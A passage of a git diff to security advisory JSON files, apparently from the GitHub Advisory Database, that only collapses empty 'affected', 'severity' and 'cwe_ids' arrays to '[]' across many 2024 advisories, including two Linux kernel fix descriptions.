@@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/09/GHSA-2vgj-5cmq-q6q3/GHSA-2vgj-5cmq-q6q3.json b/advisories/unreviewed/2024/09/GHSA-2vgj-5cmq-q6q3/GHSA-2vgj-5cmq-q6q3.json index c0351402ea2..85c94723dd7 100644 --- a/advisories/unreviewed/2024/09/GHSA-2vgj-5cmq-q6q3/GHSA-2vgj-5cmq-q6q3.json +++ b/advisories/unreviewed/2024/09/GHSA-2vgj-5cmq-q6q3/GHSA-2vgj-5cmq-q6q3.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/09/GHSA-67q3-cfc5-wcpq/GHSA-67q3-cfc5-wcpq.json b/advisories/unreviewed/2024/09/GHSA-67q3-cfc5-wcpq/GHSA-67q3-cfc5-wcpq.json index 630dd7665d1..219444567f3 100644 --- a/advisories/unreviewed/2024/09/GHSA-67q3-cfc5-wcpq/GHSA-67q3-cfc5-wcpq.json +++ b/advisories/unreviewed/2024/09/GHSA-67q3-cfc5-wcpq/GHSA-67q3-cfc5-wcpq.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/09/GHSA-6g49-7hrc-9j92/GHSA-6g49-7hrc-9j92.json b/advisories/unreviewed/2024/09/GHSA-6g49-7hrc-9j92/GHSA-6g49-7hrc-9j92.json index 4d8843b4275..51d00fcf45f 100644 --- a/advisories/unreviewed/2024/09/GHSA-6g49-7hrc-9j92/GHSA-6g49-7hrc-9j92.json +++ b/advisories/unreviewed/2024/09/GHSA-6g49-7hrc-9j92/GHSA-6g49-7hrc-9j92.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/09/GHSA-7h55-66vh-33gg/GHSA-7h55-66vh-33gg.json b/advisories/unreviewed/2024/09/GHSA-7h55-66vh-33gg/GHSA-7h55-66vh-33gg.json index ea3958f2a74..dcb3e0bc0e4 100644 --- a/advisories/unreviewed/2024/09/GHSA-7h55-66vh-33gg/GHSA-7h55-66vh-33gg.json +++ b/advisories/unreviewed/2024/09/GHSA-7h55-66vh-33gg/GHSA-7h55-66vh-33gg.json @@ -7,12 +7,8 @@ "CVE-2024-45007" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nchar: xillybus: Don't destroy workqueue from work item running on it\n\nTriggered by a kref decrement, destroy_workqueue() may be called from\nwithin a work item for destroying its own workqueue. This illegal\nsituation is averted by adding a module-global workqueue for exclusive\nuse of the offending work item. Other work items continue to be queued\non per-device workqueues to ensure performance.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -40,9 +36,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/09/GHSA-82q8-gr92-pr6w/GHSA-82q8-gr92-pr6w.json b/advisories/unreviewed/2024/09/GHSA-82q8-gr92-pr6w/GHSA-82q8-gr92-pr6w.json index 6830675d8d2..a799b578020 100644 --- a/advisories/unreviewed/2024/09/GHSA-82q8-gr92-pr6w/GHSA-82q8-gr92-pr6w.json +++ b/advisories/unreviewed/2024/09/GHSA-82q8-gr92-pr6w/GHSA-82q8-gr92-pr6w.json @@ -7,12 +7,8 @@ "CVE-2024-45008" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nInput: MT - limit max slots\n\nsyzbot is reporting too large allocation at input_mt_init_slots(), for\nnum_slots is supplied from userspace using ioctl(UI_DEV_CREATE).\n\nSince nobody knows possible max slots, this patch chose 1024.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -52,9 +48,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/09/GHSA-8c2m-6m99-9w9r/GHSA-8c2m-6m99-9w9r.json b/advisories/unreviewed/2024/09/GHSA-8c2m-6m99-9w9r/GHSA-8c2m-6m99-9w9r.json index 206a1c446e4..9b9729fe659 100644 --- a/advisories/unreviewed/2024/09/GHSA-8c2m-6m99-9w9r/GHSA-8c2m-6m99-9w9r.json +++ b/advisories/unreviewed/2024/09/GHSA-8c2m-6m99-9w9r/GHSA-8c2m-6m99-9w9r.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/09/GHSA-gpvf-6hpf-4f9h/GHSA-gpvf-6hpf-4f9h.json b/advisories/unreviewed/2024/09/GHSA-gpvf-6hpf-4f9h/GHSA-gpvf-6hpf-4f9h.json index dcc5c36b786..7795172a64e 100644 --- a/advisories/unreviewed/2024/09/GHSA-gpvf-6hpf-4f9h/GHSA-gpvf-6hpf-4f9h.json +++ b/advisories/unreviewed/2024/09/GHSA-gpvf-6hpf-4f9h/GHSA-gpvf-6hpf-4f9h.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/09/GHSA-h4gc-cjxx-79fw/GHSA-h4gc-cjxx-79fw.json b/advisories/unreviewed/2024/09/GHSA-h4gc-cjxx-79fw/GHSA-h4gc-cjxx-79fw.json index 62ab6afb4df..a7120fff53e 100644 --- a/advisories/unreviewed/2024/09/GHSA-h4gc-cjxx-79fw/GHSA-h4gc-cjxx-79fw.json +++ b/advisories/unreviewed/2024/09/GHSA-h4gc-cjxx-79fw/GHSA-h4gc-cjxx-79fw.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/09/GHSA-hph4-74mx-4369/GHSA-hph4-74mx-4369.json b/advisories/unreviewed/2024/09/GHSA-hph4-74mx-4369/GHSA-hph4-74mx-4369.json index c814657bae9..e11b90d7cb9 100644 --- a/advisories/unreviewed/2024/09/GHSA-hph4-74mx-4369/GHSA-hph4-74mx-4369.json +++ b/advisories/unreviewed/2024/09/GHSA-hph4-74mx-4369/GHSA-hph4-74mx-4369.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/09/GHSA-hwvg-2jxc-754g/GHSA-hwvg-2jxc-754g.json b/advisories/unreviewed/2024/09/GHSA-hwvg-2jxc-754g/GHSA-hwvg-2jxc-754g.json index 9a2b8353d29..3fcefdc0fcb 100644 --- a/advisories/unreviewed/2024/09/GHSA-hwvg-2jxc-754g/GHSA-hwvg-2jxc-754g.json +++ b/advisories/unreviewed/2024/09/GHSA-hwvg-2jxc-754g/GHSA-hwvg-2jxc-754g.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/09/GHSA-mmm5-wgvp-wp8r/GHSA-mmm5-wgvp-wp8r.json b/advisories/unreviewed/2024/09/GHSA-mmm5-wgvp-wp8r/GHSA-mmm5-wgvp-wp8r.json index e97ed1a9e9b..131f182e502 100644 --- a/advisories/unreviewed/2024/09/GHSA-mmm5-wgvp-wp8r/GHSA-mmm5-wgvp-wp8r.json +++ b/advisories/unreviewed/2024/09/GHSA-mmm5-wgvp-wp8r/GHSA-mmm5-wgvp-wp8r.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/09/GHSA-mq6r-xpp8-hm92/GHSA-mq6r-xpp8-hm92.json b/advisories/unreviewed/2024/09/GHSA-mq6r-xpp8-hm92/GHSA-mq6r-xpp8-hm92.json index c87f9c70dca..7d080fa79b4 100644 --- a/advisories/unreviewed/2024/09/GHSA-mq6r-xpp8-hm92/GHSA-mq6r-xpp8-hm92.json +++ b/advisories/unreviewed/2024/09/GHSA-mq6r-xpp8-hm92/GHSA-mq6r-xpp8-hm92.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/09/GHSA-pf52-hh8x-27rf/GHSA-pf52-hh8x-27rf.json b/advisories/unreviewed/2024/09/GHSA-pf52-hh8x-27rf/GHSA-pf52-hh8x-27rf.json index 3b8bd72ce56..e4ac1decdfe 100644 --- a/advisories/unreviewed/2024/09/GHSA-pf52-hh8x-27rf/GHSA-pf52-hh8x-27rf.json +++ b/advisories/unreviewed/2024/09/GHSA-pf52-hh8x-27rf/GHSA-pf52-hh8x-27rf.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/09/GHSA-pm7g-mpjq-33gr/GHSA-pm7g-mpjq-33gr.json b/advisories/unreviewed/2024/09/GHSA-pm7g-mpjq-33gr/GHSA-pm7g-mpjq-33gr.json index b353490266d..92577406428 100644 --- a/advisories/unreviewed/2024/09/GHSA-pm7g-mpjq-33gr/GHSA-pm7g-mpjq-33gr.json +++ b/advisories/unreviewed/2024/09/GHSA-pm7g-mpjq-33gr/GHSA-pm7g-mpjq-33gr.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/09/GHSA-x32q-36fr-233c/GHSA-x32q-36fr-233c.json b/advisories/unreviewed/2024/09/GHSA-x32q-36fr-233c/GHSA-x32q-36fr-233c.json index f6d9c1275cf..c65c21d85d4 100644 --- a/advisories/unreviewed/2024/09/GHSA-x32q-36fr-233c/GHSA-x32q-36fr-233c.json +++ b/advisories/unreviewed/2024/09/GHSA-x32q-36fr-233c/GHSA-x32q-36fr-233c.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY",